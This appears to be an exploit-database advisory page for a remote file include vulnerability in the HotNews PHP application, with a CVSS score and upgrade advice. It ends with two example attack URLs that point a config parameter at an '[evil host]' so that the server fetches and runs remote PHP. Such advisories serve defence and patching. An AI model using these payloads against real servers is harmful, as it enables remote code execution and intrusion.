header-logo
Suggest Exploit
vendor:
HotNews
by:
SecurityFocus
7.5
CVSS
HIGH
Multiple File Include
98
CWE
Product Name: HotNews
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2002-1390
CPE: o:hotnews:hotnews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

HotNews Multiple File Include Vulnerability

HotNews is prone to multiple file include vulnerabilities, which allows remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.

Mitigation:

Upgrade to the latest version of HotNews.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9357/info
 
HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.

http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3